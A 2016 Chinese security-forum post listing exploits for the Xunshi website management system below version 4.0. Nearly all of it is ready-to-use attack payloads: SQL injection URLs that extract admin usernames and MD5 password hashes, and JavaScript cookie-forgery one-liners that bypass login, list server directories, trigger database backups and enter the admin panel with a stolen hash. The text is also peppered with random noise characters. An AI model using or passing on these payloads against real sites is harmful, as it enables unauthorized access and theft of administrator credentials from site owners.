找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1912|回复: 0
打印 上一主题 下一主题

讯时网站管理系统4.0以下漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2016-5-11 14:55:08 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
一、注入+ O# ^# E1 k# l! u3 E
1、news_more.asp?lm=2 %41nd 1=2 union %53elect 1,2,3,0x3b%26user,0x3b%26pass,6,7,8 %46rom %41dmin union %53elect * %46rom lm where 1=2
4 J& E6 t, g, t- H5 S, z
2 L6 S) @  j9 X' q- E  e2、第一步:javascript:alert(document.cookie="adminuser=admin");alert(document.cookie="admindj=1");location.href="admin_chk.asp"
" `8 V4 o3 M& H第二步:请求:admin_lm_edit.asp?id=1 %41nd 1=2 union %53elect 1,2,3,4,id%260x3b%26user%260x3b%26pass,6,7,8%20%46rom%20%41dmin' e7 g0 X3 e: P
可得到用户名和MD5加密码的密码。
9 C0 e8 e0 H* ?4 n$ r  o( T  ~$ a5 O" w
二、cookies欺骗4 E, |  k+ V1 i5 a/ e' W& `+ A

) j' y' K9 n! j+ Q9 w& w+ n1、直接进后台,适用于较低版本,一般login.asp和admin_index.asp在同一目录下的版本有此漏洞. ! w8 ]7 J; C$ h) Y( h2 k
javascript:alert(document.cookie="adminuser="+escape("'or'='or'"));alert(document.cookie="adminpass="+escape("'or'='or'"));alert(document.cookie="admindj="+escape("1"));location.href="admin_index.asp"
! h$ p0 U2 {- z5 V9 z# Y  s& H) I! R: v5 z
2、列目录. . y; e& c$ ]/ T& X6 D
javascript:alert(document.cookie="admindj="+escape("1"));location.href="edit/admin_uploadfile.asp?dir=.."
1 F/ J/ w/ h( x9 ~' b8 x% \- W  S9 P( l, _8 ~% d+ E8 c
3、数据库备份(适用性好像比较低.)
4 b, q( U; A; V  @, o+ o" |+ ljavascript:alert(document.cookie="admindj="+escape("1"));location.href="admin_db_backup.asp?action=backupdata"4 q* F2 K! {+ E7 M: t4 w

6 E7 H$ d& m, \2 ]2 i- _9 e& S4、得到MD5密码解不了密进后台方法
7 i2 R! T1 g/ ^: Pjavascript:alert(document.cookie="adminuser="+escape("用户名")); alert(document.cookie="adminpass="+escape("md5密码")); alert(document.cookie="admindj="+escape("1"));location.href="admin_index.asp"
. r4 u" F2 C* s: C
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表